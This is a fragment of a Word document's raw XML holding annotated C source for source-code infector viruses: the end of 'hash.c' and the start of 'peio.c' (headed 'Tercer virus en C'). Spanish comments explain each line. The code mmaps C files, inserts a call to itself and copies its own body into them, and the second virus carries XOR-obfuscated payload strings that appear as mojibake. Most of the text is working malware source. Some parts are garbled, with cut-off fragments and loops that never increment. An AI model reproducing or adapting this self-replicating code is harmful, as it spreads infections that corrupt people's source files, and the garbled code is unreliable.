      <w:r>
        <w:tab/>
        <w:t>//el ciclo for ira decrementando de el resultado de la resta de size y ipos</w:t>
      </w:r>
      <w:r w:rsidR="00120657">
        <w:t xml:space="preserve"> dividido ihole </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hasta meyor o igual a 0 (cantidad de bytes) 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for(i=(size-ipos)/ihole;i&gt;=0;i--)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  <w:t>//la funcion memcpy copia la cantidad de bytes origen a destino el origen es el primer parametro el segundo separado por una coma es el destino y el tercero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  <w:t>//el tamaño</w:t>
      </w:r>
      <w:r w:rsidR="00271CDB">
        <w:t xml:space="preserve"> (realiza la infeccion)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  <w:t>memcpy(ptr+ipos+i*ihole+ihole, ptr+ipos+i*ihole, ihole);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memcpy(ptr+ipos, hashinc, ihole);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//almasenamos la suma de mpos y de ihole  en la variable mpos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mpos += ihole;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//almacenamos en la variable buff de tipo char lo que devulve la funcion malloc que es la cantidad de memoria para asignar a bytes.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 xml:space="preserve">//La función sizeof, devuelve el tamaño en bytes que ocupa una variable o algun tipo de dato que es char no importa el tamaño siempre va a ocupar 2bytes  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buf = (char *)malloc(20*sizeof(char));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//copia la variable de destino bbuff la cadena de string especificado por segundo parametro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strcpy(buf,"\n\tinit_hash();");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//en la variable thole de tipo int se almacena el calculo de numero de caracteres de lacadena apuntada expresada por parametros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thole = strlen(buf);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//cilco for que decrece que va del resultado de la suma de size mas ihole menos mpos dividido thole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for(i=(size+ihole-mpos)/thole;i&gt;=0;i--)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  <w:t>//la funcion memcpy copia la cantidad de bytes origen a destino el origen es el primer parametro el segundo separado por una coma es el destino y el tercero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  <w:t>//el tamaño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  <w:t>memcpy(ptr+mpos+i*thole+thole, ptr+mpos+i*thole, thole);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>memcpy(ptr+mpos, buf, thole);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//se almacena en la variable bhole el calculo de numeros de caracteres de la cadena apuntada expresada en el parametro de la funcion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bhole = strlen(hashbeg);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memcpy(ptr+size+ihole+thole, hashbeg, bhole);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A"/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/* declaracion de arrays y arrays */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 xml:space="preserve">//en buf se almacena lo que devulve la funcion malloc que es la cant de memoria a asignar a bytes  por parametros los bytes a asignar son el tamaño de bytes que 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//ocupa una varible(sizeof) y el calculo de numeros de caracteres de la cadena apuntada que se expresa por parametros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buf = (char *)malloc(100*sizeof(char)+strlen(hashinc));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//cilco for que va de 0 a la cantidad de numeros de caracteres que contenga hashinc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for(i=0,j=0;i&lt;strlen(hashinc);i,j)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  <w:t>//con la condicion switch evaluamos lo que se encuentra a cada bucle de for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  <w:t>switch(hashinc[i])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//si se encuentra \n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'\n':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//crea una cadena de texto  con la funcion sprintf por primer parametro le pasamos la cadena de destino y el segundo la cedena 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//retorna la cantidad de caracteres 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sprintf(buf+j, "\\n");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//contador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j++;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//pausa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'\t':</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374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//lo mismo que en el primer case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sprintf(buf+j, "\\t");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j++;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'\\':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//lo mismo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sprintf(buf+j, "\\\\");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j++;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'\"':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//lo mismo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sprintf(buf+j, "\\\"");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j++;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default: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sprintf(buf+j, "%c", hashinc[i]);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  <w:t>//la funcion memcpy copia la cantidad de bytes origen a destino el origen es el primer parametro el segundo separado por una coma es el destino y el tercero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  <w:t>//el tamaño en este caso la cantidad de numeros de caracteres que contiene buf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memcpy(ptr+size+ihole+thole+bhole, buf, strlen(buf));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sumamos a bhole la cantidad de numeros de caracteres que hay en buf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bhole += strlen(buf);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//crea una cadena de caracteres y da el formato sin impriir nada por primer parametro le pasamos la cadena de destino y el segundo parametro es la cadena que se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//almacenara en el destino</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>sprintf(ptr+size+ihole+thole+bhole, "\";\n\tchar hashbeg[] =\"");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//en bhole sumamos lo que hay en esa variable mas 21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bhole += 21;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//en buff se almacenara lo que devuelva la funcion mallocque es la cantidad de memoria a asignar abytes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buf = (char *)malloc(100*sizeof(char)+strlen(hashbeg));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//cilco for que va de 0 a la cantidad de numeros de caracteres que contenga hashinc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for(i=0,j=0;i&lt;strlen(hashbeg);i,j)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//con la condicion switch evaluamos lo que se encuentra a cada bucle de for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  <w:t>switch(hashbeg[i])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//si se encuentra \n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'\n':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//crea una cadena de texto  con la funcion sprintf por primer parametro le pasamos la cadena de destino y el segundo la cedena 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//retorna la cantidad de caracteres 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sprintf(buf+j, "\\n");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j++;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'\t':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sprintf(buf+j, "\\t");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j++;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'\\':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sprintf(buf+j, "\\\\");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j++;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5374A" w:rsidRDefault="0055374A" w:rsidP="0055374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'\"':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sprintf(buf+j, "\\\"");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j++;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//sino se cumple las demas condiciones del case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default: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sprintf(buf+j, "%c", hashbeg[i]);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  <w:t>//la funcion memcpy copia la cantidad de bytes origen a destino el origen es el primer parametro el segundo separado por una coma es el destino y el tercero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  <w:t>//el tamaño en este caso la cantidad de numeros de caracteres que contiene buf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memcpy(ptr+size+ihole+thole+bhole, buf, strlen(buf));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">   //suma o cumulador tambien conocido que guarda el calculo de numero de caracteres a la cadena apuntada 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bhole += strlen(buf);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 xml:space="preserve">////crea una cadena de texto  con la funcion sprintf por primer parametro le pasamos la cadena de destino y el segundo la cedena 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 xml:space="preserve">//retorna la cantidad de caracteres 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sprintf(ptr+size+ihole+thole+bhole, "\";\n\tchar hashend[] =\"");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//suma el valor que se encuentra almacenado en la variable bhole y le suma 21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bhole += 21;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 xml:space="preserve">//almacenamos en buf lo que devuelve la funcion malloc(catidad de memoria a asignar a bytes) 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buf = (char *)malloc(100*sizeof(char)+strlen(hashend));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//cilco for que va de 0 a la cantidad de numeros de caracteres que contenga hashinc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for(i=0,j=0;i&lt;strlen(hashend);i,j)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374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//con la condicion switch evaluamos lo que se encuentra a cada bucle de for</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A"/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  <w:t>switch(hashend[i])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//si se encuntra \n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'\n':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//crea una cadena de texto  con la funcion sprintf por primer parametro le pasamos la cadena de destino y el segundo la cedena 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//retorna la cantidad de caracteres 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sprintf(buf+j, "\\n");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//contador</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A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j++;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A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//pausa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'\t':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sprintf(buf+j, "\\t");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j++;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'\\':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sprintf(buf+j, "\\\\");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j++;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'\"':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sprintf(buf+j, "\\\"");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j++;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//en caso de que no se encuentre ningun caracter de los tipos especificados en cada case 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default:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374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sprintf(buf+j, "%c", hashend[i]);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//la funcion memcpy copia la cantidad de bytes origen a destino el origen es el primer parametro el segundo separado por una coma es el destino y el tercero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  <w:r>
        <w:tab/>
        <w:t>//el tamaño en este caso la cantidad de numeros de caracteres que contiene buf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memcpy(ptr+size+ihole+thole+bhole, buf, strlen(buf));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//se sumara y guarada en la variable bhole lo que hay en esa variable mas la cant de numeros de caracteres que tenga buf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bhole += strlen(buf);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 xml:space="preserve">//crea una cadena de texto primer parametro cadena de destino y el segundo la cadena de formato de tipo string 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sprintf(ptr+size+ihole+thole+bhole, "\";\n");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">   //se suma tres a lo que haya en bhole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bhole += 3;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">        //se almacena en ehole la cantidad de numeros de caracteres a la cadena que estamos apuntando expresada por parametros en la funcion strlen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ehole = strlen(hashend);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memcpy(ptr+size+ihole+thole+bhole, hashend, ehole);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msync(ptr, size+page, MS_SYNC);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 xml:space="preserve">//borra ubicaciones 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munmap(ptr, size+page);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00467A97" w:rsidRDefault="00467A97" w:rsidP="00467A97">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">//hacen que el archivo normal denominado por ruta o referenciado por fd se trunque  a un tamaño de bytes de longitud precisa </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00467A97" w:rsidRDefault="00467A97" w:rsidP="00467A97">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">//Si el archivo anterior era más grande que este tamaño, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">los datos adicionales se pierden. Si el archivo anteriormente era más corto, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00467A97" w:rsidRDefault="00467A97" w:rsidP="00467A97">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//se extiende y la parte ex</w:t>
      </w:r>
      <w:r>
        <w:t>tendida se lee como bytes nulos</w:t>
      </w:r>
      <w:r>
        <w:t>('\ 0')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ftruncate(fd, size+ihole+thole+bhole+ehole);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//en caso de que no se cumpla el if</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{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 xml:space="preserve">//borrara las ubicaciones </w:t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</w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>munmap(ptr, size);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>&lt;---------------------&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>&lt;---- end of hash.c---&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="00467A97" w:rsidP="0055374A">
      <w:r>
        <w:t>&lt;--------------------</w:t>
      </w:r>
      <w:r w:rsidR="0055374A">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00467A97" w:rsidRDefault="00467A97" w:rsidP="0055374A"/>
    <w:p w:rsidR="00467A97" w:rsidRDefault="00467A97" w:rsidP="0055374A"/>
    <w:p w:rsidR="00467A97" w:rsidRDefault="00467A97" w:rsidP="00467A97">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tercer virus en C</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t>&lt;----------------&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t>&lt;-----peio.c-----&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t>&lt;----------------&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C"/>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t xml:space="preserve"> * Peio,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t xml:space="preserve"> * source code infector XORing hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t xml:space="preserve"> *                   zert &lt;zert@int80h.net&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C"/>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>#include &lt;sys/stat.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t>#include &lt;sys/mman.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t>#include &lt;unistd.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t>#include &lt;dirent.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t>#include &lt;fcntl.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C"/>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t>void init_hash();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C"/>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t>int main(int argc, char *argv[])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
        <w:t>init_hash();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C"/>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t>void init_hash()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
        <w:t>//variables de tipo entero</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
        <w:t>int i, j, fd, size, mpos, ipos, page,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
        <w:t>ihole, thole, bhole, ehole;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
        <w:t>//variables que representan una estructura</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> struct dirent *dir;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> //variable de tipo DIR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  DIR *d;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  //de tipo void </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
        <w:t>void *ptr;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
        <w:t>//array de tipo char que almacenan una cadena de string escrito en XOR o cifrado en XOR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
        <w:t>char hashinc[] = "?£éîãìõäå 1/4óôäéï(r)è3/4?£éîãìõäå 1/4óùó¯óôáô(r)è3/4?£éîãìõäå 1/4óùó¯ííáî(r)è3/4?£éîãìõäå 1/4õîéóôä(r)è3/4?£éîãìõäå 1/4äéòåîô(r)è3/4?£éîãìõäå 1/4æãîôì(r)è3/4??öïéä éîéôßèáóèš(c)" ?";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:tab/>
        <w:t>char hashbeg[] = "?öïéä éîéôßèáóèš(c)?û??éîô é¬ ê¬ æä¬ óéúå¬ íðïó¬ éðïó¬ ðáçå¬ ??éèïìå¬ ôèïìå¬ âèïìå¬ åèïìå" óôòõãô äéòåîô ªäéò" ÄÉÒ ªä"??öïéä ªðôò"??ãèáò èáóèéîãÛÝ 1/2 ¢";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9696C" w:rsidRDefault="00D9696C" w:rsidP="00D9696C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>char hashend[] = "?ãèáò ªâõæ"???ä 1/2 ïðåîäéòš¢(r)¢(c)"??÷èéìåššäéò 1/2 òåáääéòšä(c)(c)3/4°(c)???éæš¡šóôòãíðšäéò­3/4äßîáíå"óôòìåîšäéò­3/4äßîáíå(c)­²¬¢(r)ã¢(c)(c)üü???   ¡šóôòãíðšäéò­3/4äßîáíå"óôòìåîšäéò­3/4äßîáíå(c)­²¬¢(r)Ã¢(c)(c)(c) ????éæššæä1/2ïðåîšäéò­3/4äßîáíå¬ ÏßÒÄ×Ò¬ °(c)(c)3/41/2°(c)????û?????óéúå 1/2 ìóååëšæä¬ °¬ ÓÅÅËßÅÎÄ(c)"?????ðôò 1/2 ííáðšÎÕÌÌ¬óéúå¬ÐÒÏÔßÒÅÁÄ¬ÍÁÐßÐÒÉÖÁÔÅ¬æä¬°(c)"?????éæš š¡óôòóôòšðôò¬¢éîéôßèáóè¢(c)(c) ŠŠ?????  š ššíðïó1/2šéîô(c)óôòóôòšðôò¬¢Üîíáéîš¢(c)(c)3/4°(c) üü?????    ššíðïó1/2šéîô(c)óôòóôòšðôò¬¢Üîéîô íáéîš¢(c)(c)3/4°(c) üü?????    ššíðïó1/2šéîô(c)óôòóôòšðôò¬¢Üîöïéä íáéîš¢(c)(c)3/4°(c) üü ?????    ššíðïó1/2šéîô(c)óôòóôòšðôò¬¢Üîíáéî š¢(c)(c)3/4°(c) üü?????    ššíðïó1/2šéîô(c)óôòóôòšðôò¬¢Üîéîô íáéî š¢(c)(c)3/4°(c) üü?????    ššíðïó1/2šéîô(c)óôòóôòšðôò¬¢Üîöïéä íáéî š¢(c)(c)3/4°(c) (c) (c)?????û??????íðïó 1/2 šéîô(c)óôòóôòššöïéä ª(c)íðïó¬ ¢"Üî¢(c)"??????íðïó ­1/2 šéîô(c)­­ðôò"??????éæš ¡šéðïó 1/2 šéîô(c)óôòóôòš""ðôò¬ ¢£éîãìõäå 1/4¢(c)(c) (c)??????û???????íõîíáðšðôò¬ óéúå(c)"???????âòåáë"??????ý??????íõîíáðšðôò¬ óéúå(c)"??????ðáçå 1/2 ³ ª šéîô(c)óùóãïîæšßÓÃßÐÁÇÅÓÉÚÅ(c)"??????æôòõîãáôåšæä¬ óéúå"ðáçå(c)"??????ðôò 1/2 ííáðšÎÕÌÌ¬óéúå"ðáçå¬ÐÒÏÔßÒÅÁÄ"ÐÒÏÔß×ÒÉÔÅ¬ÍÁÐßÓÈÁÒÅÄ¬æä¬°(c)"??????éðïó 1/2 šéîô(c)óôòóôòšðôò¬ ¢£éîãìõäå 1/4¢(c)"??????éðïó 1/2 šéîô(c)óôòóôòššöïéä ª(c)éðïó¬ ¢ÜîÜî¢(c)"??????éðïó ­1/2 šéîô(c)ðôò"??????æïòšé1/2°"é1/4óôòìåîšèáóèéîã(c)"é""(c)???????èáóèéîãÛéÝ Þ1/2 °øž°"??????æïòšé1/2°"é1/4óôòìåîšèáóèâåç(c)"é""(c)???????èáóèâåçÛéÝ Þ1/2 °øž°"??????éèïìå 1/2 óôòìåîšèáóèéîã(c)"??????æïòšé1/2šóéúå­éðïó(c)¯éèïìå"é3/41/2°"é­­(c) ???????íåíãðùšðôò"éðïó"éªéèïìå"éèïìå¬ ðôò"éðïó"éªéèïìå¬ éèïìå(c)"??????íåíãðùšðôò"éðïó¬ èáóèéîã¬ éèïìå(c)"??????æïòšé1/2°"é1/4óôòìåîšèáóèéîã(c)"é""(c)???????èáóèéîãÛéÝ Þ1/2 °øž°"??????íðïó "1/2 éèïìå"??????âõæ 1/2 šãèáò ª(c)íáììïãš²°ªóéúåïæšãèáò(c)(c)"??????óôòãðùšâõæ¬¢ÜîÜôéîéôßèáóèš(c)"¢(c)"??????ôèïìå 1/2 óôòìåîšâõæ(c)"??????æïòšé1/2šóéúå"éèïìå­íðïó(c)¯ôèïìå"é3/41/2°"é­­(c) ???????íåíãðùšðôò"íðïó"éªôèïìå"ôèïìå¬ ðôò"íðïó"éªôèïìå¬ ôèïìå(c)"??????íåíãðùšðôò"íðïó¬ âõæ¬ ôèïìå(c)"??????âèïìå 1/2 óôòìåîšèáóèâåç(c)"??????íåíãðùšðôò"óéúå"éèïìå"ôèïìå¬ èáóèâåç¬ âèïìå(c)"??????íåíãðùšðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ èáóèéîã¬ éèïìå(c)"??????âèïìå "1/2 éèïìå"??????óðòéîôæšðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ ¢Ü¢"ÜîÜôãèáò èáóèâåçÛÝ 1/2 Ü¢¢(c)"??????âèïìå "1/2 ²²"??????æïòšé1/2°"é1/4óôòìåîšèáóèâåç(c)"é""(c)???????èáóèâåçÛéÝ Þ1/2 °øž°"??????íåíãðùšðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ èáóèâåç¬ óôòìåîšèáóèâåç(c)(c)"??????âèïìå "1/2 óôòìåîšèáóèâåç(c)"??????óðòéîôæšðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ ¢Ü¢"ÜîÜôãèáò èáóèåîäÛÝ 1/2 Ü¢¢(c)"??????âèïìå "1/2 ²²"??????íåíãðùšðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ èáóèåîä¬ óôòìåîšèáóèåîä(c)(c)"??????âèïìå "1/2 óôòìåîšèáóèåîä(c)"??????óðòéîôæšðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ ¢Ü¢"Üî¢(c)"??????âèïìå "1/2 ³"??????æïòšé1/2°"é1/4óôòìåîšèáóèåîä(c)"é""(c)???????èáóèåîäÛéÝ Þ1/2 °øž°"??????åèïìå 1/2 óôòìåîšèáóèåîä(c)"??????íåíãðùšðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ èáóèåîä¬ åèïìå(c)"??????íóùîãšðôò¬ óéúå"ðáçå¬ ÍÓßÓÙÎÃ(c)"??????íõîíáðšðôò¬ óéúå"ðáçå(c)"??????æôòõîãáôåšæä¬ óéúå"éèïìå"ôèïìå"âèïìå"åèïìå(c)"?????ý åìóå?????û??????íõîíáðšðôò¬ óéúå(c)"?????ý????ý?ý?";</w:t>
      </w:r>
    </w:p>
